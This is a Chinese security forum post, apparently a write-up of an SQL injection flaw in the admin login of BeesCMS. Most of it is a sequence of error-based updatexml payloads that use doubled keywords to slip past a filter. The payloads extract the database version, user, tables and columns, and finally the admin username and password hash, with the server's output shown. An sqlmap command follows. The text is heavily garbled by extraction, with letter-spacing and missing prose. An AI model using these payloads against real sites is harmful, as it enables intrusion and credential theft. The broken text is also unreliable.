[27057] 2020-08-06_BeesCMS的SQL注入漏洞

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-19
2020-08-06_BeesCMS的SQL注入漏洞 B e e s C M S S Q L     M s 0 8 0 6 7   2 0 2 0 - 0 8 - 0 6   #   , 2 3 a r a k h M S 0 8 0 6 7 W e b B e e s C M S S Q L 1 .           2 .   S Q L   使 3 .   使         s q l   a n d     s e l e c t     l i k e     a n d       a n   a n d   d     s e l e c t     s e l e s e l e c t c t   f r o m     f r o   f r o m   m           w h e r e w h   w h e r e   e r e           使 u n i o n   使  
              4 .       / /   u s e r = a d m i n '   a   a n d   n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , v e r s i o n ( ) , 0 x 7 e ) , 1 ) - & p a s s w o r d = f d j a l & c o d e = d 4 1 b & s u b m i t = t r u e & s u b m i t . x = 4 2 & s u b m i t . y = 3 5 X P A T H   s y n t a x   e r r o r :   ' ~ 5 . 5 . 5 3 ~ '           / /     u s e r = a d m i n '   a   a n d   n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , u s e r ( ) , 0 x 7 e ) , 1 ) - & p a s s w o r d = f d j a l & c o d e = d 4 1 b & s u b m i t = t r u e & s u b m i t . x = 4 2 & s u b m i t . y = 3 5 X P A T H   s y n t a x   e r r o r :   ' ~ r o o t @ l o c a l h o s t ~ '         / /     u s e r = a d m i n '   a   a n d   n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , d a t a b a s e ( ) , 0 x 7 e ) , 1 ) - & p a s s w o r d = f d j a l & c o d e = d 4 1 b & s u b m i t = t r u e & s u b m i t . x = 4 2 & s u b m i t . y = 3 5 X P A T H   s y n t a x   e r r o r :   ' ~ b e e s c m s ~ '         / /     u s e r = a d m i n '   a   a n d   n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l s e l e c t e c t   g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r   f r o m   o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e   w h e r e   r e   t a b l e _ s c h e m a   l i k e   d a t a b a s e ( ) ) , 0 x 7 e ) , 1 ) - & p a s s w o r d = f d j a l & c o d e = d 4 1 b & s u b m i t = t r u e & s u b m i t . x = 4 2 & s u b m i t . y = 3 5 X P A T H   s y n t a x   e r r o r :   ' ~ b e e s _ a d m i n , b e e s _ a d m i n _ g r o u p , b e e ' 使   3 2     u s e r = a d m i n '   a   a n d   n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , s u b s t r ( ( s e l s e l e c t e c t   g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r   f r o m   o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e   w h e r e   r e   t a b l e _ s c h e m a   l i k e   d a t a b a s e ( ) ) , 1 , 3 2 ) , 0 x 7 e ) , 1 ) - & p a s s w o r d = f d j a l & c o d e = d 4 1 b & s u b m i t = t r u e & s u b m i t . x = 4 2 & s u b m i t . y = 3 5
u s e r = a d m i n '   a   a n d   n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , s u b s t r ( ( s e l s e l e c t e c t   g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r   f r o m   o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e   w h e r e   r e   t a b l e _ s c h e m a   l i k e   d a t a b a s e ( ) ) , 3 2 , 6 4 ) , 0 x 7 e ) , 1 ) - & p a s s w o r d = f d j a l & c o d e = d 4 1 b & s u b m i t = t r u e & s u b m i t . x = 4 2 & s u b m i t . y = 3 5         / /   b e e s _ a d m i n   u s e r = a d m i n '   a   a n d   n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l s e l e c t e c t   g r o u p _ c o n c a t ( c o l u m n _ n a m e )   f r   f r o m   o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e   w h e r e   r e   t a b l e _ s c h e m a   l i k e   d a t a b a s e ( )   a   a n d   n d   t a b l e _ n a m e   l i k e   ' b e e s _ a d m i n ' ) , 0 x 7 e ) , 1 ) - & p a s s w o r d = f d j a l & c o d e = d 4 1 b & s u b m i t = t r u e & s u b m i t . x = 4 2 & s u b m i t . y = 3 5 X P A T H   s y n t a x   e r r o r :   ' ~ i d , a d m i n _ n a m e , a d m i n _ p a s s w o r d , a d ' 使 s u b s t r         / /     u s e r = a d m i n '   a   a n d   n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l s e l e c t e c t   g r o u p _ c o n c a t ( a d m i n _ n a m e )   f r   f r o m   o m   b e e s c m s . b e e s _ a d m i n ) , 0 x 7 e ) , 1 ) - & p a s s w o r d = f d j a l & c o d e = d 4 1 b & s u b m i t = t r u e & s u b m i t . x = 4 2 & s u b m i t . y = 3 5 X P A T H   s y n t a x   e r r o r :   ' ~ a d m i n ~ ' u s e r = a d m i n '   a   a n d   n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l s e l e c t e c t   a d m i n _ p a s s w o r d   f r   f r o m   o m   b e e s c m s . b e e s _ a d m i n   w h   w h e r e   e r e   a d m i n _ n a m e   l i k e   ' a d m i n ' ) , 0 x 7 e ) , 1 ) - & p a s s w o r d = f d j a l & c o d e = d 4 1 b & s u b m i t = t r u e & s u b m i t . x = 4 2 & s u b m i t . y = 3 5 X P A T H   s y n t a x   e r r o r :   ' ~ 2 1 2 3 2 f 2 9 7 a 5 7 a 5 a 7 4 3 8 9 4 a 0 e 4 a 8 0 1 f c ' u s e r = a d m i n '   a   a n d   n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , s u b s t r ( ( s e l s e l e c t e c t   a d m i n _ p a s s w o r d   f r   f r o m   o m   b e e s c m s . b e e s _ a d m i n   w h   w h e r e   e r e   a d m i n _ n a m e   l i k e   ' a d m i n ' ) , 2 4 , 6 4 ) , 0 x 7 e ) , 1 ) - & p a s s w o r d = f d j a l & c o d e = d 4 1 b & s u b m i t = t r u e & s u b m i t . x = 4 2 & s u b m i t . y = 3 5 X P A T H   s y n t a x   e r r o r :   ' ~ e 4 a 8 0 1 f c 3 ~ ' m d 5 2 1 2 3 2 f 2 9 7 a 5 7 a 5 a 7 4 3 8 9 4 a 0 e 4 a 8 0 1 f c 3             a d m i n 5 .   S Q L M a p C : U s e r s A d m i n i s t r a t o r D e s k t o p s q l m a p > s q l m a p . p y   - r   b e e s . l o g   - p   " u s e r "
2 6 0 0 0 +
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则